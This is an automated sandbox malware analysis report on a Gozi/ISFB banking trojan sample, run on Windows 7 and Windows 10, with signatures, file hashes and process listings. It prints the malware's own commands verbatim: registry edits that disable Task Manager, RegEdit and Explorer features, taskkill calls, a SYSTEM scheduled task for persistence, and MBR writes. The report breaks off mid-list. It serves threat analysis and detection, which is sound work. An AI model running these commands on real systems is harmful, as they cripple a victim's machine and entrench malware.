Malware Analysis Report

2025-01-22 18:58

Sample ID 240317-e4tm8sef6x
Target e98af5555d9174b86254a186db60ba82.bin
SHA256 2207f4926319896f1d5b1bf2acd6d0cda56dbc47131b5fd21a7d726ba6dfaa2d
Tags
upx gozi banker evasion isfb persistence trojan bootkit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2207f4926319896f1d5b1bf2acd6d0cda56dbc47131b5fd21a7d726ba6dfaa2d

Threat Level: Known bad

The file e98af5555d9174b86254a186db60ba82.bin was found to be: Known bad.

Malicious Activity Summary

upx gozi banker evasion isfb persistence trojan bootkit

Gozi

Disables Task Manager via registry modification

Drops file in Drivers directory

Disables RegEdit via registry modification

Executes dropped EXE

UPX packed file

Checks computer location settings

Writes to the Master Boot Record (MBR)

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-17 04:30

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-17 04:30

Reported

2024-03-17 04:32

Platform

win7-20240221-en

Max time kernel

15s

Max time network

1s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

Signatures

Gozi

banker trojan gozi

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\19E7.tmp\\2.exe" C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\ickr0a.exe C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\IExplorer = "0" C:\Windows\system32\reg.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 2240 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 2240 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 2240 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 3008 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe

"C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\19E7.tmp\19E8.bat C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f

C:\Windows\system32\rundll32.exe

rundll32 user32, SwapMouseButton

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM taskmgr.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM notepad.exe /F

C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe

2.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe"

Network

N/A

Files

memory/2240-0-0x0000000000400000-0x0000000000443000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\19E7.tmp\19E8.bat

MD5 1f7a5456ca38839ec9e112425e7fa747
SHA1 8019978db5a80de11bb32463aa7160bb4a4d6b8a
SHA256 f955addebe88273b07cd9db9484f6aaaff58bec7f06898f8cdf224fa8b9cecb6
SHA512 eb57e75f96b7c663af44015e4dca2d6d07d9fed0db609bb6bad790093d0cef69e30ea6bb31093dd505af82a873c7a12f4bfcebe6f68938728d30053fff7c0818

memory/2240-5-0x0000000000400000-0x0000000000443000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe

MD5 4bc20c24fbea4588741203c77126c7b3
SHA1 5f2d2fec4e1d7c752be551363743069d9a4e7510
SHA256 4cd2ce15d0752711a76118fba8046193a1847c85a3278410191c0a015b387be3
SHA512 3e508012250ad6115e49b059a7fc103274190be425403df7081aa3e4caf130b9fa685c3228cafb6a031c121acdd95d72c1f5180f42caea55213a7bd9de71b31f

memory/2240-9-0x0000000000400000-0x0000000000443000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-17 04:30

Reported

2024-03-17 04:32

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

Signatures

Gozi

banker trojan gozi

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\rteth.sys C:\Windows\system32\cmd.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\50DF.tmp\\2.exe" C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\gw1gni.exe C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\IExplorer = "0" C:\Windows\system32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3528 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 3528 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 4164 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe

"C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50DF.tmp\50E0.bat C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f

C:\Windows\system32\reg.exe

